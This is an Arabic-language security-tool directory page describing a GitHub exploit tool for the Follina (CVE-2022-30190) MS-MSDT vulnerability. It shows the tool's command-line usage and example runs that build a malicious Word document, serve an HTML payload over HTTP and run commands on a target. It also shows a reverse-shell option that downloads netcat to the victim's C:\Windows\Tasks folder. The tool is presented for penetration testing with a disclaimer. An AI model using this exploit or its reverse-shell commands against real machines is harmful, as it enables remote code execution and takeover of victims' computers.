Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FOLLINA-CVE-2022-30190 — تنفيذ FOLLINA-CVE-2022-30190 | Kitploit
أدوات/GitHubGitHub/toxicenvelope/follina-cve-2022-30190
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubtoxicenvelope/follina-cve-2022-30190

FOLLINA-CVE-2022-30190

تنفيذ FOLLINA-CVE-2022-30190

عرض المستودع
111منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

FOLLINA-CVE-2022-30190

تنفيذ FOLLINA-CVE-2022-30190


يحتوي هذا المستودع على أداة استغلال للثغرة FOLLINA-CVE-2022-30190

إخلاء المسؤولية

طُوّرت هذه الأداة لأغراض اختبار الأمان والبحث العلمي. من خلال استنساخ / تفريع هذه الأداة، يخلي المطوّر الأصلي مسؤوليته عن أي أفعال يقوم بها المستخدمون.


المتطلبات الأساسية

  1. اقرأ عن CVE-2022-30190 من هنا
  2. جهّز بيئة الاختبار الخاصة بك (أقترح استخدام Virtual Box + Vagrant)
  • حمّل VirtualBox من هنا
  • حمّل Vagrant من هنا
  • اقرأ عن واجهة سطر أوامر Vagrant من هنا

أنشئ هجوم "Follina" عبر MS-MSDT باستخدام مستند Microsoft Word خبيث وقدّم الحمولة عبر خادم HTTP.

الاستخدام

usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)

أمثلة

شغّل calc.exe:

$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

شغّل cmd.exe:

$ python3 exploit.py --command "cmd"

احصل على قشرة عكسية على المنفذ 9001. لاحظ أن هذا ينزّل ثنائي netcat على الجهاز الضحي ويضعه في C:\Windows\Tasks. لا يقوم بتنظيف الثنائي. سيؤدي هذا إلى إثارة اكتشافات برامج مكافحة الفيروسات ما لم يتم تعطيلها.

$ python3 exploit.py --reverse 9001
تنزيل الأداة